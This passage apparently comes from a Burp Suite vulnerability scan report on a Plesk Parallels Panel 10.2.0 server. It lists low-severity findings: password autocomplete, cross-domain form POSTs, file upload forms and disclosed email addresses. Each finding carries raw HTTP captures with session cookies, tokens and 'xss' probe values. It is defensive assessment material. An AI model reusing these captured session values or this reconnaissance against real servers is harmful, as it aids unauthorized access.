<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...
</DIV>
       
       <form action="/plesk/reseller@3/backup/ftp-repository/properties/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
...[SNIP]...
<td><INPUT maxlength="255" name="ftp_password" id="fid-ftp_password" type="password" value="" size="25"></td>
...[SNIP]...
<td><INPUT maxlength="255" name="ftp_confirm_password" id="fid-ftp_confirm_password" type="password" value="" size="25"></td>
...[SNIP]...

6.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/my-profile  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/my-profile

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /smb/my-profile HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 12:14:22 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 12:14:22 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 12:14:23 GMT
Server: sw-cp-server
Content-Length: 40703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<div id="main">

<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'>
...[SNIP]...
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...

7. Cross-domain POST  previous  next
There are 3 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


7.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/extras-domain/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/extras-domain/

Issue detail

The page contains a form which POSTs data to the domain myplesk.com. The form contains the following fields:

Request

GET /plesk/reseller@3/extras-domain/?cmd=extras_domain&mpc_connect=true HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:27:44 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 24 Sep 2011 15:27:44 GMT
Server: sw-cp-server
Content-Length: 866

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head><meta http-equiv="X-UA-Compatible" content="IE=7"/></head>
<body onLoad="document.fo
...[SNIP]...
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9pt; color: #000000"> Contacting service, please wait ...
<form action="https://myplesk.com/master/handler2.php" method="post"><input type="hidden" name="data" value="U2FsdGVkX1%2BSs2MTJgblx%2Bu%2B5jAhUQUV3LDaMGQL8Q4I%2Fy88YxqGGfaLv88g7EIo%0AGV7H45X0yoHCX3ui%2Ffl89ZHNNG4VYL1kZkZ7g3dKyJCGugbyrcrTDwUuUN6KYa3Q%0AwS5b%2BDeddT36y7l
...[SNIP]...

7.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/manage-domain/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/manage-domain/

Issue detail

The page contains a form which POSTs data to the domain myplesk.com. The form contains the following fields:

Request

GET /plesk/reseller@3/manage-domain/?cmd=doms_mng&mpc_connect=true HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:27:51 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 24 Sep 2011 15:27:51 GMT
Server: sw-cp-server
Content-Length: 868

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head><meta http-equiv="X-UA-Compatible" content="IE=7"/></head>
<body onLoad="document.fo
...[SNIP]...
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9pt; color: #000000"> Contacting service, please wait ...
<form action="https://myplesk.com/master/handler2.php" method="post"><input type="hidden" name="data" value="U2FsdGVkX18VV3UAoI5vRqU6ZF9z2%2FNh%2BYh9gH1XYvIyHmjFWkd9cYhvQLQuJSPe%0AW7TN2XlsWPnZ%2FSn%2BWPNcwsZo2J3oPc5Ssn3%2BnflU1A72te9g4a8W7%2FsAnubMPkUp%0ADbrd8cdu7CMrFEQ
...[SNIP]...

7.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/register-domain/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/register-domain/

Issue detail

The page contains a form which POSTs data to the domain myplesk.com. The form contains the following fields:

Request

GET /plesk/reseller@3/register-domain/?cmd=doms_reg&mpc_connect=true HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:27:46 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 24 Sep 2011 15:27:46 GMT
Server: sw-cp-server
Content-Length: 874

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head><meta http-equiv="X-UA-Compatible" content="IE=7"/></head>
<body onLoad="document.fo
...[SNIP]...
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9pt; color: #000000"> Contacting service, please wait ...
<form action="https://myplesk.com/master/handler2.php" method="post"><input type="hidden" name="data" value="U2FsdGVkX18zjQPN%2FFjzEK1ydRHpv24TArc%2Bwbpxyw3tTya8BTV9o0I8idmGmg%2BP%0Aj%2FS94w2qgjSELdsAHhFRnsfsP5YJaY8PVpvItQ67KlZSzlvF%2FeRpZznPt8SkqEn3%0Ah6c5lQVBXX1EZbc%2
...[SNIP]...

8. File upload functionality  previous  next
There are 4 instances of this issue:

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:


8.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/logo/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/logo/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/client@3/logo/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:27:36 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=home; path=/
Date: Sat, 24 Sep 2011 15:27:36 GMT
Server: sw-cp-server
Content-Length: 9604

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...
<td><input name="logo_file" id="fid-logo_file" type="file" size="25"></td>
...[SNIP]...

8.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/skeleton/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/client@3/skeleton/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:27:00 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=home; path=/
Date: Sat, 24 Sep 2011 15:27:00 GMT
Server: sw-cp-server
Content-Length: 21840

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...
<div class="option"><input name="skelfile" type="file"></div>
...[SNIP]...

8.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/upload/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/upload/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/reseller@3/backup/local-repository/upload/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:31:36 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:36 GMT
Server: sw-cp-server
Content-Length: 7624

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...
<td><input type="file" name="file[]"></td>
...[SNIP]...

8.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/custom-buttons/custom-button@new/properties/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/reseller@3/custom-buttons/custom-button@new/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:28:40 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=home; path=/
Date: Sat, 24 Sep 2011 15:28:40 GMT
Server: sw-cp-server
Content-Length: 11584

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...
<td><input type="file" name="fname" id="fid-fname"></td>
...[SNIP]...

9. Email addresses disclosed  previous  next
There are 6 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


9.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/create

Issue detail

The following email address was disclosed in the response:

Request

POST /admin/customer/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
Content-Length: 832
Cache-Control: max-age=0
Origin: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=customers

contactInfoSection%5BcontactInfo%5D%5BcontactName%5D=zxss&contactInfoSection%5BcontactInfo%5D%5Bemail%5D=xss%40xss.cx&contactInfoSection%5BcontactInfo%5D%5BcompanyName%5D=xss&contactInfoSection%5Bcont
...[SNIP]...

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 14:15:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:15:11 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:15:11 GMT
Server: sw-cp-server
Content-Length: 35954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<input type="text" name="contactInfoSection[contactInfo][email]" id="contactInfoSection-contactInfo-email" value="xss@xss.cx" class="f-middle-size input-text" />
...[SNIP]...

9.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/personal-info/

Issue detail

The following email address was disclosed in the response:

Request

GET /admin/reseller/personal-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 14:17:12 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:17:12 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=personal-info; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:17:12 GMT
Server: sw-cp-server
Content-Length: 28204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<input type="text" name="contactInfo[email]" id="contactInfo-email" value="xss@xss.cx" class="f-middle-size input-text" />
...[SNIP]...

9.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/get_password.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /get_password.php

Issue detail

The following email address was disclosed in the response:

Request

POST /get_password.php HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
Content-Length: 114
Cache-Control: max-age=0
Origin: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/get_password.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

forgery_protection_token=c7878983c80b3cf3da41783ee040bd4b&cmd=get_password&login_name=xss&email=xss%40xss.cx&send=

Response

HTTP/1.1 200 OK
Expires: Fri, 28 May 1999 00:00:00 GMT
Last-Modified: Fri, 23 Sep 2011 18:23:14 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Type: text/html; charset=utf-8
Date: Fri, 23 Sep 2011 18:23:15 GMT
Server: sw-cp-server
Content-Length: 5430

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Cont
...[SNIP]...
<input type="text" name="email" id="getLinkSection-email" value="xss@xss.cx" class="input-text" />
...[SNIP]...

9.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin-info/

Issue detail

The following email address was disclosed in the response:

Request

GET /plesk/admin-info/?context=personal-info HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 19:12:11 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=personal-info; path=/
Date: Fri, 23 Sep 2011 19:12:11 GMT
Server: sw-cp-server
Content-Length: 20512

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="067
...[SNIP]...
<input type="text" name="email" id="fid-email" value="admin@xss.cx" size="25" maxlength="255">
...[SNIP]...

